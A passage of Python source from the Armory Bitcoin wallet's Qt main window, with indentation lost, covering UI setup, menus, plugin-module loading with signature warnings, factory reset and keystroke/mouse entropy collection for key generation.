lastVerStr = self.settings.get('LastVersionLoad')
if not lastVerStr==currVerStr:
LOGINFO('First load of new version: %s', currVerStr)
self.firstLoadNewVersion = True
self.settings.set('LastVersionLoad', currVerStr)
# Because dynamically retrieving addresses for querying transaction
# comments can be so slow, I use this txAddrMap to cache the mappings
# between tx's and addresses relevant to our wallets. It really only
# matters for massive tx with hundreds of outputs -- but such tx do
# exist and this is needed to accommodate wallets with lots of them.
self.txAddrMap = {}
def updateProgress(val):
if splashScreen is not None:
splashScreen.updateProgress(val)
self.loadWalletsAndSettings(updateProgress)
eulaAgreed = self.getSettingOrSetDefault('Agreed_to_EULA', False)
if not eulaAgreed:
DlgEULA(self,self).exec_()
armoryengine.ArmoryUtils.DEFAULT_ADDR_TYPE = \
self.getSettingOrSetDefault('Default_ReceiveType', 'P2PKH')
if not self.abortLoad:
self.acquireProcessMutex()
# acquireProcessMutex may have set this flag if something went wrong
if self.abortLoad:
LOGWARN('Armory startup was aborted. Closing.')
os._exit(0)
# We need to query this once at the beginning, to avoid having
# strange behavior if the user changes the setting but hasn't
# restarted yet...
self.doAutoBitcoind = \
self.getSettingOrSetDefault('ManageSatoshi', not OS_MACOSX)
# This is a list of alerts that the user has chosen to no longer
# be notified about
alert_str = str(self.getSettingOrSetDefault('IgnoreAlerts', ""))
if alert_str == "":
alerts = []
else:
alerts = alert_str.split(",")
self.ignoreAlerts = {int(s):True for s in alerts}
# Setup system tray and register "bitcoin:" URLs with the OS
self.setupSystemTray()
self.setupUriRegistration()
self.heartbeatCount = 0
self.extraHeartbeatSpecial = []
self.extraHeartbeatAlways = []
self.extraHeartbeatOnline = []
self.extraNewTxFunctions = []
self.extraNewBlockFunctions = []
self.extraShutdownFunctions = []
self.extraGoOnlineFunctions = []
self.oneTimeScanAction = {}
self.walletDialogDict = {}
self.lblArmoryStatus = QRichLabel_AutoToolTip(self.tr('<font color=%1>Offline</font> ').arg(htmlColor('TextWarn')), doWrap=False)
self.statusBar().insertPermanentWidget(0, self.lblArmoryStatus)
# Table for all the wallets
self.walletModel = AllWalletsDispModel(self)
self.walletsView = QTableView(self)
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.walletsView.setModel(self.walletModel)
self.walletsView.setSelectionBehavior(QTableView.SelectRows)
self.walletsView.setSelectionMode(QTableView.SingleSelection)
self.walletsView.verticalHeader().setDefaultSectionSize(sectionSz)
self.walletsView.setMinimumSize(viewWidth, viewHeight)
self.walletsView.setItemDelegate(AllWalletsCheckboxDelegate(self))
self.walletsView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.walletsView.hideColumn(0)
if self.usermode == USERMODE.Standard:
initialColResize(self.walletsView, [20, 0, 0.35, 0.2, 0.2])
else:
initialColResize(self.walletsView, [20, 0.15, 0.30, 0.2, 0.20])
if self.settings.hasSetting('LastFilterState'):
if self.settings.get('LastFilterState')==4:
self.walletsView.showColumn(0)
self.connect(self.walletsView, SIGNAL('doubleClicked(QModelIndex)'),
self.execDlgWalletDetails)
self.connect(self.walletsView, SIGNAL('clicked(QModelIndex)'),
self.execClickRow)
self.walletsView.setColumnWidth(WLTVIEWCOLS.Visible, 20)
w,h = tightSizeNChar(GETFONT('var'), 100)
# Prepare for tableView slices (i.e. "Showing 1 to 100 of 382", etc)
self.numShowOpts = [100,250,500,1000,'All']
self.sortLedgOrder = Qt.AscendingOrder
self.sortLedgCol = 0
self.currLedgMin = 1
self.currLedgMax = 100
self.currLedgWidth = 100
btnAddWallet = QPushButton(self.tr("Create Wallet"))
btnImportWlt = QPushButton(self.tr("Import or Restore Wallet"))
self.connect(btnAddWallet, SIGNAL('clicked()'), self.startWalletWizard)
self.connect(btnImportWlt, SIGNAL('clicked()'), self.execImportWallet)
# Put the Wallet info into it's own little box
lblAvail = QLabel(self.tr("<b>Available Wallets:</b>"))
viewHeader = makeLayoutFrame(HORIZONTAL, [lblAvail, \
'Stretch', \
btnAddWallet, \
btnImportWlt, ])
wltFrame = QFrame()
wltFrame.setFrameStyle(QFrame.Box|QFrame.Sunken)
wltLayout = QGridLayout()
wltLayout.addWidget(viewHeader, 0,0, 1,3)
wltLayout.addWidget(self.walletsView, 1,0, 1,3)
wltFrame.setLayout(wltLayout)
# Make the bottom 2/3 a tabwidget
self.mainDisplayTabs = QTabWidget()
# Put the labels into scroll areas just in case window size is small.
self.tabDashboard = QWidget()
self.setupDashboard()
# Combo box to filter ledger display
self.comboWltSelect = QComboBox()
self.populateLedgerComboBox()
self.connect(self.comboWltSelect, SIGNAL('activated(int)'),
self.changeWltFilter)
self.lblTot = QRichLabel(self.tr('<b>Maximum Funds:</b>'), doWrap=False);
self.lblSpd = QRichLabel(self.tr('<b>Spendable Funds:</b>'), doWrap=False);
self.lblUcn = QRichLabel(self.tr('<b>Unconfirmed:</b>'), doWrap=False);
self.lblTotalFunds = QRichLabel('-'*12, doWrap=False)
self.lblSpendFunds = QRichLabel('-'*12, doWrap=False)
self.lblUnconfFunds = QRichLabel('-'*12, doWrap=False)
self.lblTotalFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpendFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUnconfFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblTot.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpd.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUcn.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblBTC1 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC2 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC3 = QRichLabel('<b>BTC</b>', doWrap=False)
self.ttipTot = self.createToolTipWidget( self.tr(
'Funds if all current transactions are confirmed. '
'Value appears gray when it is the same as your spendable funds.'))
self.ttipSpd = self.createToolTipWidget( self.tr('Funds that can be spent <i>right now</i>'))
self.ttipUcn = self.createToolTipWidget( self.tr(
'Funds that have less than 6 confirmations, and thus should not '
'be considered <i>yours</i>, yet.'))
self.frmTotals = QFrame()
self.frmTotals.setFrameStyle(STYLE_NONE)
frmTotalsLayout = QGridLayout()
frmTotalsLayout.addWidget(self.lblTot, 0,0)
frmTotalsLayout.addWidget(self.lblSpd, 1,0)
frmTotalsLayout.addWidget(self.lblUcn, 2,0)
frmTotalsLayout.addWidget(self.lblTotalFunds, 0,1)
frmTotalsLayout.addWidget(self.lblSpendFunds, 1,1)
frmTotalsLayout.addWidget(self.lblUnconfFunds, 2,1)
frmTotalsLayout.addWidget(self.lblBTC1, 0,2)
frmTotalsLayout.addWidget(self.lblBTC2, 1,2)
frmTotalsLayout.addWidget(self.lblBTC3, 2,2)
frmTotalsLayout.addWidget(self.ttipTot, 0,3)
frmTotalsLayout.addWidget(self.ttipSpd, 1,3)
frmTotalsLayout.addWidget(self.ttipUcn, 2,3)
self.frmTotals.setLayout(frmTotalsLayout)
# Add the available tabs to the main tab widget
self.MAINTABS = enum('Dash','Ledger')
self.mainDisplayTabs.addTab(self.tabDashboard, self.tr('Dashboard'))
##########################################################################
if not CLI_OPTIONS.disableModules:
if USE_TESTNET or USE_REGTEST:
self.loadArmoryModulesNoZip()
# Armory Modules are diabled on main net. If enabled it uses zip files to
# contain the modules
# else:
# self.loadArmoryModules()
##########################################################################
self.lbDialog = None
btnSendBtc = QPushButton(self.tr("Send Bitcoins"))
btnRecvBtc = QPushButton(self.tr("Receive Bitcoins"))
btnWltProps = QPushButton(self.tr("Wallet Properties"))
btnOfflineTx = QPushButton(self.tr("Offline Transactions"))
btnMultisig = QPushButton(self.tr("Lockboxes (Multi-Sig)"))
self.connect(btnWltProps, SIGNAL('clicked()'), self.execDlgWalletDetails)
self.connect(btnRecvBtc, SIGNAL('clicked()'), self.clickReceiveCoins)
self.connect(btnSendBtc, SIGNAL('clicked()'), self.clickSendBitcoins)
self.connect(btnOfflineTx,SIGNAL('clicked()'), self.execOfflineTx)
self.connect(btnMultisig, SIGNAL('clicked()'), self.browseLockboxes)
verStr = 'Armory %s / %s' % (getVersionString(BTCARMORY_VERSION),
UserModeStr(self, self.usermode))
lblInfo = QRichLabel(verStr, doWrap=False)
lblInfo.setFont(GETFONT('var',10))
lblInfo.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
logoBtnFrame = []
logoBtnFrame.append(self.lblLogoIcon)
logoBtnFrame.append(btnSendBtc)
logoBtnFrame.append(btnRecvBtc)
logoBtnFrame.append(btnWltProps)
if self.usermode in (USERMODE.Advanced, USERMODE.Expert):
logoBtnFrame.append(btnOfflineTx)
if self.usermode in (USERMODE.Expert,):
logoBtnFrame.append(btnMultisig)
logoBtnFrame.append(lblInfo)
logoBtnFrame.append('Stretch')
btnFrame = makeVertFrame(logoBtnFrame, STYLE_SUNKEN)
logoWidth=220
btnFrame.sizeHint = lambda: QSize(logoWidth*1.0, 10)
btnFrame.setMaximumWidth(logoWidth*1.2)
btnFrame.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
layout = QGridLayout()
layout.addWidget(btnFrame, 0, 0, 1, 1)
layout.addWidget(wltFrame, 0, 1, 1, 1)
layout.addWidget(self.mainDisplayTabs, 1, 0, 1, 2)
layout.setRowStretch(0, 1)
layout.setRowStretch(1, 5)
# Attach the layout to the frame that will become the central widget
mainFrame = QFrame()
mainFrame.setLayout(layout)
self.setCentralWidget(mainFrame)
self.setMinimumSize(750,500)
# Start the user at the dashboard
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
##########################################################################
# Set up menu and actions
#MENUS = enum('File', 'Wallet', 'User', "Tools", "Network")
currmode = self.getSettingOrSetDefault('User_Mode', 'Advanced')
MENUS = enum('File', 'User', 'Tools', 'Addresses', 'Wallets', \
'MultiSig', 'Help')
self.menu = self.menuBar()
self.menusList = []
self.menusList.append( self.menu.addMenu(self.tr('&File')) )
self.menusList.append( self.menu.addMenu(self.tr('&User')) )
self.menusList.append( self.menu.addMenu(self.tr('&Tools')) )
self.menusList.append( self.menu.addMenu(self.tr('&Addresses')) )
self.menusList.append( self.menu.addMenu(self.tr('&Wallets')) )
self.menusList.append( self.menu.addMenu(self.tr('&MultiSig')) )
self.menusList.append( self.menu.addMenu(self.tr('&Help')) )
#self.menusList.append( self.menu.addMenu('&Network') )
def exportTx():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Transactions Unavailable'),
self.tr('Transaction history cannot be collected until Armory is '
'in online mode. Please try again when Armory is online. '),
QMessageBox.Ok)
return
else:
DlgExportTxHistory(self,self).exec_()
actExportTx = self.createAction(self.tr('&Export Transactions...'), exportTx)
actSettings = self.createAction(self.tr('&Settings...'), self.openSettings)
actMinimApp = self.createAction(self.tr('&Minimize Armory'), self.minimizeArmory)
actExportLog = self.createAction(self.tr('Export &Log File...'), self.exportLogFile)
actCloseApp = self.createAction(self.tr('&Quit Armory'), self.closeForReal)
self.menusList[MENUS.File].addAction(actExportTx)
self.menusList[MENUS.File].addAction(actSettings)
self.menusList[MENUS.File].addAction(actMinimApp)
self.menusList[MENUS.File].addAction(actExportLog)
self.menusList[MENUS.File].addAction(actCloseApp)
def chngStd(b):
if b: self.setUserMode(USERMODE.Standard)
def chngAdv(b):
if b: self.setUserMode(USERMODE.Advanced)
def chngDev(b):
if b: self.setUserMode(USERMODE.Expert)
modeActGrp = QActionGroup(self)
actSetModeStd = self.createAction(self.tr('&Standard'), chngStd, True)
actSetModeAdv = self.createAction(self.tr('&Advanced'), chngAdv, True)
actSetModeDev = self.createAction(self.tr('&Expert'), chngDev, True)
modeActGrp.addAction(actSetModeStd)
modeActGrp.addAction(actSetModeAdv)
modeActGrp.addAction(actSetModeDev)
self.menusList[MENUS.User].addAction(actSetModeStd)
self.menusList[MENUS.User].addAction(actSetModeAdv)
self.menusList[MENUS.User].addAction(actSetModeDev)
LOGINFO('Usermode: %s', currmode)
self.firstModeSwitch=True
if currmode=='Standard':
self.usermode = USERMODE.Standard
actSetModeStd.setChecked(True)
elif currmode=='Advanced':
self.usermode = USERMODE.Advanced
actSetModeAdv.setChecked(True)
elif currmode=='Expert':
self.usermode = USERMODE.Expert
actSetModeDev.setChecked(True)
def openMsgSigning():
MessageSigningVerificationDialog(self,self).exec_()
def openBlindBroad():
if not TheSDM.satoshiIsAvailable():
QMessageBox.warning(self, self.tr("Not Online"), self.tr(
'Bitcoin Core is not available, so Armory will not be able '
'to broadcast any transactions for you.'), QMessageBox.Ok)
return
DlgBroadcastBlindTx(self,self).exec_()
actOpenSigner = self.createAction(self.tr('&Message Signing/Verification...'), openMsgSigning)
if currmode=='Expert':
actOpenTools = self.createAction(self.tr('&EC Calculator...'), lambda: DlgECDSACalc(self,self, 1).exec_())
actBlindBroad = self.createAction(self.tr('&Broadcast Raw Transaction...'), openBlindBroad)
self.menusList[MENUS.Tools].addAction(actOpenSigner)
if currmode=='Expert':
self.menusList[MENUS.Tools].addAction(actOpenTools)
self.menusList[MENUS.Tools].addAction(actBlindBroad)
def mkprom():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Offline'), self.tr(
'Armory is currently offline, and cannot determine what funds are '
'available for Simulfunding. Please try again when Armory is in '
'online mode.'), QMessageBox.Ok)
else:
DlgCreatePromNote(self, self).exec_()
def msrevsign():
title = self.tr('Import Multi-Spend Transaction')
descr = self.tr(
'Import a signature-collector text block for review and signing. '
'It is usually a block of text with "TXSIGCOLLECT" in the first line, '
'or a <i>*.sigcollect.tx</i> file.')
ftypes = ['Signature Collectors (*.sigcollect.tx)']
dlgImport = DlgImportAsciiBlock(self, self, title, descr, ftypes,
UnsignedTransaction)
dlgImport.exec_()
if dlgImport.returnObj:
DlgMultiSpendReview(self, self, dlgImport.returnObj).exec_()
simulMerge = lambda: DlgMergePromNotes(self, self).exec_()
actMakeProm = self.createAction(self.tr('Simulfund &Promissory Note'), mkprom)
actPromCollect = self.createAction(self.tr('Simulfund &Collect && Merge'), simulMerge)
actMultiSpend = self.createAction(self.tr('Simulfund &Review && Sign'), msrevsign)
if not self.usermode==USERMODE.Expert:
self.menusList[MENUS.MultiSig].menuAction().setVisible(False)
# Addresses
actAddrBook = self.createAction(self.tr('View &Address Book...'), self.execAddressBook)
actSweepKey = self.createAction(self.tr('&Sweep Private Key/Address...'), self.menuSelectSweepKey)
actImportKey = self.createAction(self.tr('&Import Private Key/Address...'), self.menuSelectImportKey)
self.menusList[MENUS.Addresses].addAction(actAddrBook)
if not currmode=='Standard':
self.menusList[MENUS.Addresses].addAction(actImportKey)
self.menusList[MENUS.Addresses].addAction(actSweepKey)
actCreateNew = self.createAction(self.tr('&Create New Wallet'), self.startWalletWizard)
actImportWlt = self.createAction(self.tr('&Import or Restore Wallet'), self.execImportWallet)
actAddressBook = self.createAction(self.tr('View &Address Book'), self.execAddressBook)
actRecoverWlt = self.createAction(self.tr('&Fix Damaged Wallet'), self.RecoverWallet)
self.menusList[MENUS.Wallets].addAction(actCreateNew)
self.menusList[MENUS.Wallets].addAction(actImportWlt)
self.menusList[MENUS.Wallets].addSeparator()
self.menusList[MENUS.Wallets].addAction(actRecoverWlt)
execAbout = lambda: DlgHelpAbout(self).exec_()
actAboutWindow = self.createAction(self.tr('&About Armory...'), execAbout)
actClearMemPool = self.createAction(self.tr('Clear All Unconfirmed'), self.clearMemoryPool)
actRescanDB = self.createAction(self.tr('Rescan Databases'), self.rescanNextLoad)
actRebuildDB = self.createAction(self.tr('Rebuild and Rescan Databases'), self.rebuildNextLoad)
actRescanBalance = self.createAction(self.tr('Rescan Balance'), self.rescanBalanceNextLoad)
actFactoryReset = self.createAction(self.tr('Factory Reset'), self.factoryReset)
self.menusList[MENUS.Help].addAction(actAboutWindow)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actClearMemPool)
self.menusList[MENUS.Help].addAction(actRescanBalance)
self.menusList[MENUS.Help].addAction(actRescanDB)
self.menusList[MENUS.Help].addAction(actRebuildDB)
self.menusList[MENUS.Help].addAction(actFactoryReset)
execMSHack = lambda: DlgSelectMultiSigOption(self,self).exec_()
execBrowse = lambda: DlgLockboxManager(self,self).exec_()
actMultiHacker = self.createAction(self.tr('Multi-Sig Lockboxes'), execMSHack)
actBrowseLockboxes = self.createAction(self.tr('Lockbox &Manager...'), execBrowse)
#self.menusList[MENUS.MultiSig].addAction(actMultiHacker)
self.menusList[MENUS.MultiSig].addAction(actBrowseLockboxes)
self.menusList[MENUS.MultiSig].addAction(actMakeProm)
self.menusList[MENUS.MultiSig].addAction(actPromCollect)
self.menusList[MENUS.MultiSig].addAction(actMultiSpend)
self.startBlockchainProcessingInitialization()
# Restore any main-window geometry saved in the settings file
hexgeom = self.settings.get('MainGeometry')
hexwltsz = self.settings.get('MainWalletCols')
if len(hexgeom)>0:
geom = QByteArray.fromHex(hexgeom)
self.restoreGeometry(geom)
if len(hexwltsz)>0:
restoreTableView(self.walletsView, hexwltsz)
if DO_WALLET_CHECK:
self.checkWallets()
self.blkReceived = RightNow()
self.setDashboardDetails()
self.execIntroDialog()
#reactor.callLater(1, self.Heartbeat)
if self.getSettingOrSetDefault('MinimizeOnOpen', False) and not CLI_ARGS:
LOGINFO('MinimizeOnOpen is True')
self.minimizeArmory()
if CLI_ARGS:
self.signalExecution.callLater(1, self.uriLinkClicked, CLI_ARGS[0])
if OS_MACOSX:
self.macNotifHdlr = ArmoryMac.MacNotificationHandler()
# Now that construction of the UI is done
# Check for warnings to be displayed
# This is true if and only if the command line has a data dir that doesn't exist
# and can't be created.
if not CLI_OPTIONS.datadir in [ARMORY_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Data Directory'), self.tr(
'Armory is using the default data directory because '
'the data directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a database dir that doesn't exist
# and can't be created.
elif not CLI_OPTIONS.armoryDBDir in [ARMORY_DB_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Database Directory'), self.tr(
'Armory is using the default database directory because '
'the database directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a bitcoin dir that doesn't exist
#if not CLI_OPTIONS.satoshiHome in [BTC_HOME_DIR, DEFAULT]:
# QMessageBox.warning(self, self.tr('Bitcoin Directory'), self.tr(
# 'Armory is using the default Bitcoin directory because '
# 'the Bitcoin directory specified in the command line could '
# 'not be found.'), QMessageBox.Ok)
if not self.getSettingOrSetDefault('DNAA_DeleteLevelDB', False) and \
os.path.exists(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA)):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Delete Old DB Directory'),
self.tr('Armory detected an older version Database. '
'Do you want to delete the old database? Choose yes if '
'do not think that you will revert to an older version of Armory.'), self.tr('Do not ask this question again'))
if reply[0]==True:
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA))
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_HEADERS))
if reply[1]==True:
self.writeSetting('DNAA_DeleteLevelDB', True)
self.signalExecution.callLater(1, self.walletTimeoutCheck)
####################################################
def getWatchingOnlyWallets(self):
result = []
for wltID in self.walletIDList:
if self.walletMap[wltID].watchingOnly:
result.append(wltID)
return result
####################################################
def changeWltFilter(self):
if self.netMode == NETWORKMODE.Offline:
return
currIdx = max(self.comboWltSelect.currentIndex(), 0)
currText = unicode(self.comboWltSelect.currentText()).lower()
if currText.lower().startswith('custom filter'):
self.walletsView.showColumn(0)
#self.walletsView.resizeColumnToContents(0)
else:
self.walletsView.hideColumn(0)
if currIdx != 4:
for i in range(0, len(self.walletVisibleList)):
self.walletVisibleList[i] = False
# If a specific wallet is selected, just set that and you're done
if currIdx > 4:
self.walletVisibleList[currIdx-7] = True
self.setWltSetting(self.walletIDList[currIdx-7], 'LedgerShow', True)
else:
# Else we walk through the wallets and flag the particular ones
typelist = [[wid, determineWalletType(self.walletMap[wid], self)[0]] \
for wid in self.walletIDList]
for i,winfo in enumerate(typelist):
wid,wtype = winfo[:]
if currIdx==0:
# My wallets
doShow = wtype in [WLTTYPES.Offline,WLTTYPES.Crypt,WLTTYPES.Plain]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==1:
# Offline wallets
doShow = winfo[1] in [WLTTYPES.Offline]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==2:
# Others' Wallets
doShow = winfo[1] in [WLTTYPES.WatchOnly]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==3:
# All Wallets
self.walletVisibleList[i] = True
self.setWltSetting(wid, 'LedgerShow', True)
self.mainLedgerCurrentPage = 1
self.PageLineEdit.setText(unicode(self.mainLedgerCurrentPage))
self.wltIDList = []
for i,vis in enumerate(self.walletVisibleList):
if vis:
wltid = self.walletIDList[i]
if self.walletMap[wltid].isEnabled:
self.wltIDList.append(wltid)
TheBDM.bdv().updateWalletsLedgerFilter(self.wltIDList)
############################################################################
def loadArmoryModulesNoZip(self):
"""
This method checks for any .py files in the exec directory
"""
moduleDir = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if not moduleDir or not os.path.exists(moduleDir):
return
LOGWARN('Attempting to load modules from: %s' % MODULES_ZIP_DIR_NAME)
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleListNoZip(moduleDir)
for moduleName,infoMap in modMap.iteritems():
module = dynamicImportNoZip(moduleDir, moduleName, globals())
plugObj = module.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critmoduleName(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module "%1" is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version. '
'<br><br> '
'Do you want to continue loading the module?').arg(moduleName),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods that will be
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def loadArmoryModules(self):
"""
This method checks for any .zip files in the modules directory
"""
modulesZipDirPath = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if modulesZipDirPath and os.path.exists(modulesZipDirPath):
self.tempModulesDirName = tempfile.mkdtemp('modules')
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleList(modulesZipDirPath)
for moduleName,infoMap in modMap.iteritems():
moduleZipPath = os.path.join(modulesZipDirPath, infoMap[MODULE_PATH_KEY])
if infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Invalid:
reply = QMessageBox.warning(self, self.tr("Invalid Module"), self.tr(
'Armory detected the following module which is '
'<font color=%1><b>invalid</b></font>:'
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will only run a module from a zip file that '
'has the required stucture.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
elif not USE_TESTNET and not USE_REGTEST and infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Unsigned:
reply = QMessageBox.warning(self, self.tr("UNSIGNED Module"), self.tr(
'Armory detected the following module which '
'<font color="%1"><b>has not been signed by Armory</b></font> and may be dangerous: '
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will not allow you to run this module.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
else:
ZipFile(moduleZipPath).extract(INNER_ZIP_FILENAME, self.tempModulesDirName)
ZipFile(os.path.join(self.tempModulesDirName,INNER_ZIP_FILENAME)).extractall(self.tempModulesDirName)
plugin = importModule(self.tempModulesDirName, moduleName, globals())
plugObj = plugin.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critmoduleName(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module %1 is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version.'
'<br><br>'
'Do you want to continue loading the module?').arg(moduleName, plugObj.maxVersion, getVersionString(BTCARMORY_VERSION)),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods that will be
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def factoryReset(self):
"""
reply = QMessageBox.information(self,'Factory Reset', \
'You are about to revert all Armory settings '
'to the state they were in when Armory was first installed. '
'<br><br>'
'If you click "Yes," Armory will exit after settings are '
'reverted. You will have to manually start Armory again.'
'<br><br>'
'Do you want to continue? ', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.removeSettingsOnClose = True
self.closeForReal()
"""
if DlgFactoryReset(self,self).exec_():
# The dialog already wrote all the flag files, just close now
self.closeForReal()
####################################################
def clearMemoryPool(self):
touchFile( os.path.join(ARMORY_HOME_DIR, 'clearmempool.flag') )
msg = self.tr(
'The next time you restart Armory, all unconfirmed transactions will '
'be cleared allowing you to retry any stuck transactions.')
if not self.doAutoBitcoind:
msg += self.tr(
'<br><br>Make sure you also restart Bitcoin Core '
'(or bitcoind) and let it synchronize again before you restart '
'Armory. Doing so will clear its memory pool as well.')
QMessageBox.information(self, self.tr('Memory Pool'), msg, QMessageBox.Ok)
####################################################
def registerWidgetActivateTime(self, widget):
# This is a bit of a hack, but it's a very isolated method to make
# it easy to link widgets to my entropy accumulator
# I just realized this doesn't do exactly what I originally intended...
# I wanted it to work on arbitrary widgets like QLineEdits, but using
# super is not the answer. What I want is the original class method
# to be called after logging keypress, not its superclass method.
# Nonetheless, it does do what I need it to, as long as you only
# registered frames and dialogs, not individual widgets/controls.
mainWindow = self
def newKPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyPressEvent(event)
def newKRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyReleaseEvent(event)
def newMPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mousePressEvent(event)
def newMRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mouseReleaseEvent(event)
from types import MethodType
widget.keyPressEvent = MethodType(newKPE, widget)
widget.keyReleaseEvent = MethodType(newKRE, widget)
widget.mousePressEvent = MethodType(newMPE, widget)
widget.mouseReleaseEvent = MethodType(newMRE, widget)
####################################################
def logEntropy(self):
try:
self.entropyAccum.append(RightNow())
self.entropyAccum.append(QCursor.pos().x())
self.entropyAccum.append(QCursor.pos().y())
except:
LOGEXCEPT('Error logging keypress entropy')
####################################################
def getExtraEntropyForKeyGen(self):
# The entropyAccum var has all the timestamps, down to the microsecond,
# of every keypress and mouseclick made during the wallet creation
# wizard. Also logs mouse positions on every press, though it will
